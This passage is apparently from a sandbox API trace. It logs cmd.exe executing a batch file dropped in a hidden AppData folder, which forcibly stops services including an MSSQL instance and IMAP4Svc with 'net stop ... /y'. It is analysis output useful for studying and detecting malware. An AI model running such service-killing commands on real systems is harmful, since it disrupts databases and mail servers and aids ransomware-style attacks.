fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.938] GetLastError () returned 0x2 [0212.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.938] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.939] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.939] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.939] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.939] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.940] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.940] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$PROFXENGAGEMENT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$PROFXENGAGEMENT /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x110, dwThreadId=0x744)) returned 1 [0212.944] CloseHandle (hObject=0x78) returned 1 [0212.944] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.944] GetProcessHeap () returned 0x3e0000 [0212.944] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.944] GetEnvironmentStringsW () returned 0x3f8408* [0212.944] GetProcessHeap () returned 0x3e0000 [0212.944] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.944] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.944] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0213.077] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0213.077] CloseHandle (hObject=0x74) returned 1 [0213.077] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0213.077] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0213.077] GetProcessHeap () returned 0x3e0000 [0213.077] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.077] GetEnvironmentStringsW () returned 0x3f8408* [0213.077] GetProcessHeap () returned 0x3e0000 [0213.077] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.078] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.078] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.078] GetProcessHeap () returned 0x3e0000 [0213.078] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.078] GetEnvironmentStringsW () returned 0x3f8408* [0213.078] GetProcessHeap () returned 0x3e0000 [0213.078] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.078] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.079] GetProcessHeap () returned 0x3e0000 [0213.079] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0213.079] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0213.079] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.079] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0213.079] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.079] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0213.079] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.079] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0213.079] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.079] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0213.079] SetConsoleInputExeNameW () returned 0x1 [0213.080] GetConsoleOutputCP () returned 0x1b5 [0213.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0213.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0213.080] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0213.080] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.080] SetFilePointer (in: hFile=0x74, lDistanceToMove=5294, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14ae [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0213.080] GetProcessHeap () returned 0x3e0000 [0213.080] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0213.081] GetProcessHeap () returned 0x3e0000 [0213.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0213.081] GetProcessHeap () returned 0x3e0000 [0213.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0213.081] GetProcessHeap () returned 0x3e0000 [0213.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0213.081] GetProcessHeap () returned 0x3e0000 [0213.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0213.081] GetProcessHeap () returned 0x3e0000 [0213.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0213.081] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.081] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14ae [0213.081] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x413, lpOverlapped=0x0) returned 1 [0213.081] SetFilePointer (in: hFile=0x74, lDistanceToMove=5316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14c4 [0213.081] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop IMAP4Svc /y\r\nGAGEMENT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 22 [0213.081] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.081] GetFileType (hFile=0x74) returned 0x1 [0213.082] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.082] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14c4 [0213.082] GetProcessHeap () returned 0x3e0000 [0213.082] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0213.082] GetProcessHeap () returned 0x3e0000 [0213.082] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0213.085] _tell (_FileHandle=3) returned 5316 [0213.085] _close (_FileHandle=3) returned 0 [0213.085] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0213.085] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0213.085] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0213.085] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0213.085] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0213.085] _wcsicmp (_String1="net", _String2="CD") returned 11 [0213.085] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0213.085] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0213.086] _wcsicmp (_String1="net", _String2="REN") returned -4 [0213.086] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0213.086] _wcsicmp (_String1="net", _String2="SET") returned -5 [0213.086] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0213.086] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0213.086] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0213.086] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0213.086] _wcsicmp (_String1="net", _String2="MD") returned 1 [0213.086] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0213.086] _wcsicmp (_String1="net", _String2="RD") returned -4 [0213.086] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0213.086] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0213.086] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0213.086] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0213.086] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0213.086] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0213.086] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0213.086] _wcsicmp (_String1="net", _String2="VER") returned -8 [0213.086] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0213.086] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0213.086] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0213.086] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0213.086] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0213.086] _wcsicmp (_String1="net", _String2="START") returned -5 [0213.086] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0213.086] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0213.086] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0213.086] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0213.086] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0213.086] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0213.086] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0213.086] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0213.086] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0213.086] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0213.087] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0213.087] SetErrorMode (uMode=0x0) returned 0x1 [0213.087] GetProcessHeap () returned 0x3e0000 [0213.087] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0213.087] GetProcessHeap () returned 0x3e0000 [0213.087] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0213.087] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.087] GetProcessHeap () returned 0x3e0000 [0213.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0213.087] GetProcessHeap () returned 0x3e0000 [0213.087] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0213.088] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0213.088] GetProcessHeap () returned 0x3e0000 [0213.088] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0213.088] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.088] GetProcessHeap () returned 0x3e0000 [0213.088] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0213.088] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0213.088] GetProcessHeap () returned 0x3e0000 [0213.088] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0213.089] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.089] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.089] GetLastError () returned 0x2 [0213.090] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.090] GetLastError () returned 0x2 [0213.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.091] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.091] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.091] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.091] GetLastError () returned 0x2 [0213.092] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.092] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.092] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.093] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0213.093] SetErrorMode (uMode=0x0) returned 0x1 [0213.093] GetProcessHeap () returned 0x3e0000 [0213.093] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0213.093] GetProcessHeap () returned 0x3e0000 [0213.093] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0213.093] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.093] GetProcessHeap () returned 0x3e0000 [0213.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0213.093] GetProcessHeap () returned 0x3e0000 [0213.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0213.094] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0213.094] GetProcessHeap () returned 0x3e0000 [0213.094] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0213.094] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.094] GetProcessHeap () returned 0x3e0000 [0213.094] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0213.094] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0213.094] GetProcessHeap () returned 0x3e0000 [0213.094] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0213.094] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.095] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.095] GetLastError () returned 0x2 [0213.095] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.096] GetLastError () returned 0x2 [0213.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.096] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0213.096] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0213.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.097] GetLastError () returned 0x2 [0213.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0213.097] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0213.098] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.098] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0213.098] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0213.098] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0213.099] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.099] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop IMAP4Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop IMAP4Svc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop IMAP4Svc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb40, dwThreadId=0xa8c)) returned 1 [0213.103] CloseHandle (hObject=0x74) returned 1 [0213.103] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.103] GetProcessHeap () returned 0x3e0000 [0213.103] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.103] GetEnvironmentStringsW () returned 0x3f8408* [0213.103] GetProcessHeap () returned 0x3e0000 [0213.103] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.103] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.103] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0213.233] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0213.234] CloseHandle (hObject=0x78) returned 1 [0213.234] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0213.234] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0213.234] GetProcessHeap () returned 0x3e0000 [0213.234] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.234] GetEnvironmentStringsW () returned 0x3f8408* [0213.234] GetProcessHeap () returned 0x3e0000 [0213.234] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.235] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.235] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.235] GetProcessHeap () returned 0x3e0000 [0213.235] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.235] GetEnvironmentStringsW () returned 0x3f8408* [0213.235] GetProcessHeap () returned 0x3e0000 [0213.235] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.235] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.235] GetProcessHeap () returned 0x3e0000 [0213.235] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0213.235] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0213.235] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.235] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0213.235] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.235] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0213.235] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.235] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0213.236] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.236] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0213.236] SetConsoleInputExeNameW () returned 0x1 [0213.236] GetConsoleOutputCP () returned 0x1b5 [0213.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0213.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0213.237] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0213.237] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.237] SetFilePointer (in: hFile=0x78, lDistanceToMove=5316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14c4 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | 